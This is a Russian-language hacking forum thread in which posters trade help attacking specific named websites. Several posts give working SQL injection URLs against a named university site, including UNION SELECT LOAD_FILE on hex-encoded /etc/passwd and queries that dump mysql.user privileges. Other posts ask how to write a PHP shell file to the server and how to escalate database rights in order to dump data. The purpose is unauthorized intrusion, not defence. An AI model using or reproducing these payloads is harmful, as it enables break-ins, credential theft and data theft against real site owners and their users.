Не думаю. Я все такие вещи складирую. Сегодня не пригодилась - завтра обязательно пригодится. Или послезавтра. Имхо.
Кто, что может подсказать (статьи, топики и т.д.) для выгодного использования одинакового ИП адреса нескольких ресурсов (один хостер)? Интересно узнать все подробности для выгоды хакеру)
вот на сайтец левый наткнулся.Дак он выдает странную ошибку,сайт должен быть посвящен японским часам.вот ссыль _ttp://urbanjunkie.ru/ Выдаёт ошибку странного содержания : PHP: SQL Error: Access denied for user 'u28586'@'localhost' (using password: YES) at /var/www/vhosts/urbanjunkie.ru/httpdocs/inc/dbconfig.inc line 4 Array ( [code] => 1045 [message] => Access denied for user 'u28586'@'localhost' (using password: YES) [query] => mysql_connect() [context] => /var/www/vhosts/urbanjunkie.ru/httpdocs/inc/dbconfig.inc line 4 ) Мне нече не надо,просто может уязвимость какая на нём.
вто инъекция под рутом. Вопрос 1. Почему не работает вот так а) (/etc/passwd) b) ('/etc/passwd') вопрос 2. Возможно ли залить шелл туда? Извиняюсь за нубский вопрос, но прошу помощи плиз.
1.magic_quotes_gpc,addslashes или ещё что-нибудь. 2.Зачем ты юзаешь concat_ws() ? Убери всё и сделай так: http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6574632f706173737764)/*
Проверь права: select concat_ws(0x3a,user,file_priv) from mhsql.user where user=твой юзер в HEX Если У - то можно полюбас.Если N - обломался,чуваг.
Помоги составить этот запрос на данном примере плиз. Я просто новичок. HTML: http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5+limit+1,1/*
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=-21595+union+select+unhex(hex(concat_ws(0x3a,user,file_priv))),2,3,4,5+from+mysql.user+where+user=0x726F6F74/* Повезло
Даже вот так можно http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=-21595+union+select+unhex(hex(group_concat(0x0a,user,0x3a,file_priv))),2,3,4,5+from+mysql.user/*
Спс. люди. А теперь мне помогите залить туда файл /tmp/phpinfo.php с текстом <? phpinfo(); ?> Я читал статьи на ачате, но там при заливке юзались ковычки и слэши а тут они вырублены. плиз подскажите add snake: ты её уже залил? помоги плиз соствит запрос.
спс за намёки. там пасс к БД. Но я очень прошу Вас помогите составить SQL запрос на заливку файла. Очень прошу плиз.
Понятно, просто чел под ником Велемир несколькими постами выше голову задурил что можно залить. А вы видите ещё способ залития туда шелла? Я думую что если там будет удалённое подключение Бд. то можно наверное тот пасс применить . Есть ещё способы?
Доброго дня всем. Подскажите пожалуйста: Можно ли имея доступ к MySQL базе данных c правами INSERT каким либо образом (специально сконструированным запросом) поднять эти самые права, так, чтобы можно было базу данных слить? Или это не выполнимая задача? Заранее извиняюсь, если вопрос покажется глупым, просто разбираюсь в SQL-injection методом проб и ошибок (язык SQL знаю плохо )
